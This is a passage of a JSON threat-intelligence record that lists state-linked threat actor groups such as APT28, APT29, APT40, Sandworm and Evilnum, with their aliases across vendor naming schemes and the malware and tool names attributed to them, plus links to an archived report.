"main_name": "APT40", "aliases": [ "ATK29", "Red Ladon", "MUDCARP", "ISLANDDREAMS", "TEMP.Periscope", "KRYPTONITE PANDA", "G0065", "TA423", "ITG09", "Gingham Typhoon", "TEMP.Jumper", "BRONZE MOHAWK", "GADOLINIUM" ], "source_name": "MISPGALAXY:APT40", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "b43c8747-c898-448a-88a9-76bff88e91b5", "created_at": "2024-02-02T02:00:04.058535Z", "updated_at": "2026-04-10T02:00:03.545252Z", "deleted_at": null, "main_name": "Opal Sleet", "aliases": [ "Konni", "Vedalia", "OSMIUM" ], "source_name": "MISPGALAXY:Opal Sleet", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "5b748f86-ac32-4715-be9f-6cf25ae48a4e", "created_at": "2024-06-04T02:03:07.956135Z", "updated_at": "2026-04-10T02:00:03.689959Z", "deleted_at": null, "main_name": "IRON HEMLOCK", "aliases": [ "APT29 ", "ATK7 ", "Blue Kitsune ", "Cozy Bear ", "The Dukes", "UNC2452 ", "YTTRIUM " ], "source_name": "Secureworks:IRON HEMLOCK", "tools": [ "CosmicDuke", "CozyCar", "CozyDuke", "DiefenDuke", "FatDuke", "HAMMERTOSS", "LiteDuke", "MiniDuke", "OnionDuke", "PolyglotDuke", "RegDuke", "RegDuke Loader", "SeaDuke", "Sliver" ], "source_id": "Secureworks", "reports": null }, { "id": "a241a1ca-2bc9-450b-a07b-aae747ee2710", "created_at": "2024-06-19T02:03:08.150052Z", "updated_at": "2026-04-10T02:00:03.737173Z", "deleted_at": null, "main_name": "IRON RITUAL", "aliases": [ "APT29", "Blue Dev 5 ", "BlueBravo ", "Cloaked Ursa ", "CozyLarch ", "Dark Halo ", "Midnight Blizzard ", "NOBELIUM ", "StellarParticle ", "UNC2452 " ], "source_name": "Secureworks:IRON RITUAL", "tools": [ "Brute Ratel C4", "Cobalt Strike", "EnvyScout", "GoldFinder", "GoldMax", "NativeZone", "RAINDROP", "SUNBURST", "Sibot", "TEARDROP", "VaporRage" ], "source_id": "Secureworks", "reports": null }, { "id": "8941e146-3e7f-4b4e-9b66-c2da052ee6df", "created_at": "2023-01-06T13:46:38.402513Z", "updated_at": "2026-04-10T02:00:02.959797Z", "deleted_at": null, "main_name": "Sandworm", "aliases": [ "IRIDIUM", "Blue Echidna", "VOODOO BEAR", "FROZENBARENTS", "UAC-0113", "Seashell Blizzard", "UAC-0082", "APT44", "Quedagh", "TEMP.Noble", "IRON VIKING", "G0034", "ELECTRUM", "TeleBots" ], "source_name": "MISPGALAXY:Sandworm", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "7bd810cb-d674-4763-86eb-2cc182d24ea0", "created_at": "2022-10-25T16:07:24.1537Z", "updated_at": "2026-04-10T02:00:04.883793Z", "deleted_at": null, "main_name": "Sandworm Team", "aliases": [ "APT 44", "ATK 14", "BE2", "Blue Echidna", "CTG-7263", "FROZENBARENTS", "G0034", "Grey Tornado", "IRIDIUM", "Iron Viking", "Quedagh", "Razing Ursa", "Sandworm", "Sandworm Team", "Seashell Blizzard", "TEMP.Noble", "UAC-0082", "UAC-0113", "UAC-0125", "UAC-0133", "Voodoo Bear" ], "source_name": "ETDA:Sandworm Team", "tools": [ "AWFULSHRED", "ArguePatch", "BIASBOAT", "Black Energy", "BlackEnergy", "CaddyWiper", "Colibri Loader", "Cyclops Blink", "CyclopsBlink", "DCRat", "DarkCrystal RAT", "Fobushell", "GOSSIPFLOW", "Gcat", "IcyWell", "Industroyer2", "JaguarBlade", "JuicyPotato", "Kapeka", "KillDisk.NCX", "LOADGRIP", "LOLBAS", "LOLBins", "Living off the Land", "ORCSHRED", "P.A.S.", "PassKillDisk", "Pitvotnacci", "PsList", "QUEUESEED", "RansomBoggs", "RottenPotato", "SOLOSHRED", "SwiftSlicer", "VPNFilter", "Warzone", "Warzone RAT", "Weevly" ], "source_id": "ETDA", "reports": null }, { "id": "8a33d3ac-14ba-441c-92c1-39975e9e1a73", "created_at": "2023-01-06T13:46:39.195689Z", "updated_at": "2026-04-10T02:00:03.243054Z", "deleted_at": null, "main_name": "Ghostwriter", "aliases": [ "UAC-0057", "UNC1151", "TA445", "PUSHCHA", "Storm-0257", "DEV-0257" ], "source_name": "MISPGALAXY:Ghostwriter", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "83025f5e-302e-46b0-baf6-650a4d313dfc", "created_at": "2024-05-01T02:03:07.971863Z", "updated_at": "2026-04-10T02:00:03.743131Z", "deleted_at": null, "main_name": "BRONZE MOHAWK", "aliases": [ "APT40 ", "GADOLINIUM ", "Gingham Typhoon ", "Kryptonite Panda ", "Leviathan ", "Nanhaishu ", "Pickleworm ", "Red Ladon ", "TA423 ", "Temp.Jumper ", "Temp.Periscope " ], "source_name": "Secureworks:BRONZE MOHAWK", "tools": [ "AIRBREAK", "BlackCoffee", "China Chopper", "Cobalt Strike", "DadJoke", "Donut", "FUSIONBLAZE", "GreenCrash", "Meterpreter", "Nanhaishu", "Orz", "SeDll" ], "source_id": "Secureworks", "reports": null }, { "id": "46b3c0fc-fa0c-4d63-a38a-b33a524561fb", "created_at": "2023-01-06T13:46:38.393409Z", "updated_at": "2026-04-10T02:00:02.955738Z", "deleted_at": null, "main_name": "APT29", "aliases": [ "Cloaked Ursa", "TA421", "Blue Kitsune", "BlueBravo", "IRON HEMLOCK", "G0016", "Nobelium", "Group 100", "YTTRIUM", "Grizzly Steppe", "ATK7", "ITG11", "COZY BEAR", "The Dukes", "Minidionis", "UAC-0029", "SeaDuke" ], "source_name": "MISPGALAXY:APT29", "tools": [ "SNOWYAMBER", "HALFRIG", "QUARTERRIG" ], "source_id": "MISPGALAXY", "reports": null }, { "id": "8ce861d7-7fbd-4d9c-a211-367c118bfdbd", "created_at": "2023-01-06T13:46:39.153487Z", "updated_at": "2026-04-10T02:00:03.232006Z", "deleted_at": null, "main_name": "Evilnum", "aliases": [ "EvilNum", "Jointworm", "KNOCKOUT SPIDER", "DeathStalker", "TA4563" ], "source_name": "MISPGALAXY:Evilnum", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "59be3740-c8c7-47aa-84c8-e80d0cb7ea3a", "created_at": "2022-10-25T15:50:23.481057Z", "updated_at": "2026-04-10T02:00:05.306469Z", "deleted_at": null, "main_name": "Leviathan", "aliases": [ "MUDCARP", "Kryptonite Panda", "Gadolinium", "BRONZE MOHAWK", "TEMP.Jumper", "APT40", "TEMP.Periscope", "Gingham Typhoon" ], "source_name": "MITRE:Leviathan", "tools": [ "Windows Credential Editor", "BITSAdmin", "HOMEFRY", "Derusbi", "at", "BLACKCOFFEE", "BADFLICK", "gh0st RAT", "PowerSploit", "MURKYTOP", "NanHaiShu", "Orz", "Cobalt Strike", "China Chopper" ], "source_id": "MITRE", "reports": null }, { "id": "730dfa6e-572d-473c-9267-ea1597d1a42b", "created_at": "2023-01-06T13:46:38.389985Z", "updated_at": "2026-04-10T02:00:02.954105Z", "deleted_at": null, "main_name": "APT28", "aliases": [ "Pawn Storm", "ATK5", "Fighting Ursa", "Blue Athena", "TA422", "T-APT-12", "APT-C-20", "UAC-0001", "IRON TWILIGHT", "SIG40", "UAC-0028", "Sofacy", "BlueDelta", "Fancy Bear", "GruesomeLarch", "Group 74", "ITG05", "FROZENLAKE", "Forest Blizzard", "FANCY BEAR", "Sednit", "SNAKEMACKEREL", "Tsar Team", "TG-4127", "STRONTIUM", "Grizzly Steppe", "G0007" ], "source_name": "MISPGALAXY:APT28", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "39ea99fb-1704-445d-b5cd-81e7c99d6012", "created_at": "2022-10-25T16:07:23.601894Z", "updated_at": "2026-04-10T02:00:04.684134Z", "deleted_at": null, "main_name": "Evilnum", "aliases": [ "G0120", "Jointworm", "Operation Phantom in the [Command] Shell", "TA4563" ], "source_name": "ETDA:Evilnum", "tools": [ "Bypass-UAC", "Cardinal RAT", "ChromeCookiesView", "EVILNUM", "Evilnum", "IronPython", "LaZagne", "MailPassView", "More_eggs", "ProduKey", "PyVil", "PyVil RAT", "SONE", "SpicyOmelette", "StealerOne", "Taurus Loader Stealer Module", "Taurus Loader TeamViewer Module", "Terra Loader", "TerraPreter", "TerraStealer", "TerraTV" ], "source_id": "ETDA", "reports": null }, { "id": "e3767160-695d-4360-8b2e-d5274db3f7cd", "created_at": "2022-10-25T16:47:55.914348Z", "updated_at": "2026-04-10T02:00:03.610018Z", "deleted_at": null, "main_name": "IRON TWILIGHT", "aliases": [ "APT28 ", "ATK5 ", "Blue Athena ", "BlueDelta ", "FROZENLAKE ", "Fancy Bear ", "Fighting Ursa ", "Forest Blizzard ", "GRAPHITE ", "Group 74 ", "PawnStorm ", "STRONTIUM ", "Sednit ", "Snakemackerel ", "Sofacy ", "TA422 ", "TG-4127 ", "Tsar Team ", "UAC-0001 " ], "source_name": "Secureworks:IRON TWILIGHT", "tools": [ "Downdelph", "EVILTOSS", "SEDUPLOADER", "SHARPFRONT" ], "source_id": "Secureworks", "reports": null }, { "id": "ae320ed7-9a63-42ed-944b-44ada7313495", "created_at": "2022-10-25T15:50:23.671663Z", "updated_at": "2026-04-10T02:00:05.283292Z", "deleted_at": null, "main_name": "APT28", "aliases": [ "APT28", "IRON TWILIGHT", "SNAKEMACKEREL", "Group 74", "Sednit", "Sofacy", "Pawn Storm", "Fancy Bear", "STRONTIUM", "Tsar Team", "Threat Group-4127", "TG-4127", "Forest Blizzard", "FROZENLAKE", "GruesomeLarch" ], "source_name": "MITRE:APT28", "tools": [ "Wevtutil", "certutil", "Forfiles", "DealersChoice", "Mimikatz", "ADVSTORESHELL", "Komplex", "HIDEDRV", "JHUHUGIT", "Koadic", "Winexe", "cipher.exe", "XTunnel", "Drovorub", "CORESHELL", "OLDBAIT", "Downdelph", "XAgentOSX", "USBStealer", "Zebrocy", "reGeorg", "Fysbis", "LoJax" ], "source_id": "MITRE", "reports": null }, { "id": "20d3a08a-3b97-4b2f-90b8-92a89089a57a", "created_at": "2022-10-25T15:50:23.548494Z", "updated_at": "2026-04-10T02:00:05.292748Z", "deleted_at": null, "main_name": "APT29", "aliases": [ "APT29", "IRON RITUAL", "IRON HEMLOCK", "NobleBaron", "Dark Halo", "NOBELIUM", "UNC2452", "YTTRIUM", "The Dukes", "Cozy Bear", "CozyDuke", "SolarStorm", "Blue Kitsune", "UNC3524", "Midnight Blizzard" ], "source_name": "MITRE:APT29", "tools": [ "PinchDuke", "ROADTools", "WellMail", "CozyCar", "Mimikatz", "Tasklist", "OnionDuke", "FatDuke", "POSHSPY", "EnvyScout", "SoreFang", "GeminiDuke", "reGeorg", "GoldMax", "FoggyWeb", "SDelete", "PolyglotDuke", "AADInternals", "MiniDuke", "SeaDuke", "Sibot", "RegDuke", "CloudDuke", "GoldFinder", "AdFind", "PsExec", "NativeZone", "Systeminfo", "ipconfig", "Impacket", "Cobalt Strike", "PowerDuke", "QUIETEXIT", "HAMMERTOSS", "BoomBox", "CosmicDuke", "WellMess", "VaporRage", "LiteDuke" ], "source_id": "MITRE", "reports": null }, { "id": "d2516b8e-e74f-490d-8a15-43ad6763c7ab", "created_at": "2022-10-25T16:07:24.212584Z", "updated_at": "2026-04-10T02:00:04.900038Z", "deleted_at": null, "main_name": "Sofacy", "aliases": [ "APT 28", "ATK 5", "Blue Athena", "BlueDelta", "FROZENLAKE", "Fancy Bear", "Fighting Ursa", "Forest Blizzard", "G0007", "Grey-Cloud", "Grizzly Steppe", "Group 74", "GruesomeLarch", "ITG05", "Iron Twilight", "Operation DealersChoice", "Operation Dear Joohn", "Operation Komplex", "Operation Pawn Storm", "Operation RoundPress", "Operation Russian Doll", "Operation Steal-It", "Pawn Storm", "SIG40", "Sednit", "Snakemackerel", "Sofacy", "Strontium", "T-APT-12", "TA422", "TAG-0700", "TAG-110", "TG-4127", "Tsar Team", "UAC-0028", "UAC-0063" ], "source_name": "ETDA:Sofacy", "tools": [ "ADVSTORESHELL", "AZZY", "Backdoor.SofacyX", "CHERRYSPY", "CORESHELL", "Carberp", "Computrace", "DealersChoice", "Delphacy", "Downdelph", "Downrage", "Drovorub", "EVILTOSS", "Foozer", "GAMEFISH", "GooseEgg", "Graphite", "HATVIBE", "HIDEDRV", "Headlace", "Impacket", "JHUHUGIT", "JKEYSKW", "Koadic", "Komplex", "LOLBAS", "LOLBins", "Living off the Land", "LoJack", "LoJax", "MASEPIE", "Mimikatz", "NETUI", "Nimcy", "OCEANMAP", "OLDBAIT", "PocoDown", "PocoDownloader", "Popr-d30", "ProcDump", "PythocyDbg", "SMBExec", "SOURFACE", "SPLM", "STEELHOOK", "Sasfis", "Sedkit", "Sednit", "Sedreco", "Seduploader", "Shunnael", "SkinnyBoy", "Sofacy", "SofacyCarberp", "SpiderLabs Responder", "Trojan.Shunnael", "Trojan.Sofacy", "USB Stealer", "USBStealer", "VPNFilter", "Win32/USBStealer", "WinIDS", "Winexe", "X-Agent", "X-Tunnel", "XAPS", "XTunnel", "Xagent", "Zebrocy", "Zekapab", "carberplike", "certutil", "certutil.exe", "fysbis", "webhp" ], "source_id": "ETDA", "reports": null }, { "id": "f27790ff-4ee0-40a5-9c84-2b523a9d3270", "created_at": "2022-10-25T16:07:23.341684Z", "updated_at": "2026-04-10T02:00:04.549917Z", "deleted_at": null, "main_name": "APT 29", "aliases": [ "APT 29", "ATK 7", "Blue Dev 5", "BlueBravo", "Cloaked Ursa", "CloudLook", "Cozy Bear", "Dark Halo", "Earth Koshchei", "G0016", "Grizzly Steppe", "Group 100", "ITG11", "Iron Hemlock", "Iron Ritual", "Midnight Blizzard", "Minidionis", "Nobelium", "NobleBaron", "Operation Ghost", "Operation Office monkeys", "Operation StellarParticle", "SilverFish", "Solar Phoenix", "SolarStorm", "StellarParticle", "TEMP.Monkeys", "The Dukes", "UNC2452", "UNC3524", "Yttrium" ], "source_name": "ETDA:APT 29", "tools": [ "7-Zip", "ATI-Agent", "AdFind", "Agentemis", "AtNow", "BEATDROP", "BotgenStudios", "CEELOADER", "Cloud Duke", "CloudDuke", "CloudLook", "Cobalt Strike", "CobaltStrike", "CosmicDuke", "Cozer", "CozyBear", "CozyCar", "CozyDuke", "Danfuan", "EnvyScout", "EuroAPT", "FatDuke", "FoggyWeb", "GeminiDuke", "Geppei", "GoldFinder", "GoldMax", "GraphDrop", "GraphicalNeutrino", "GraphicalProton", "HAMMERTOSS", "HammerDuke", "LOLBAS", "LOLBins", "LiteDuke", "Living off the Land", "MagicWeb", "Mimikatz", "MiniDionis", "MiniDuke", "NemesisGemina", "NetDuke", "OnionDuke", "POSHSPY", "PinchDuke", "PolyglotDuke", "PowerDuke", "QUIETEXIT", "ROOTSAW", "RegDuke", "Rubeus", "SNOWYAMBER", "SPICYBEAT", "SUNSHUTTLE", "SeaDaddy", "SeaDask", "SeaDesk", "SeaDuke", "Sharp-SMBExec", "SharpView", "Sibot", "Solorigate", "SoreFang", "TinyBaron", "WINELOADER", "WellMail", "WellMess", "cobeacon", "elf.wellmess", "reGeorg", "tDiscoverer" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434089, "ts_updated_at": 1775826749, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/b48c071ae18a9bef5ea4d462d70436137953a20a.pdf", "text": "https://archive.orkl.eu/b48c071ae18a9bef5ea4d462d70436137953a20a.txt", "img": "https://archive.orkl.eu/b48c071ae18a9bef5ea4d462d70436137953a20a.jpg" } }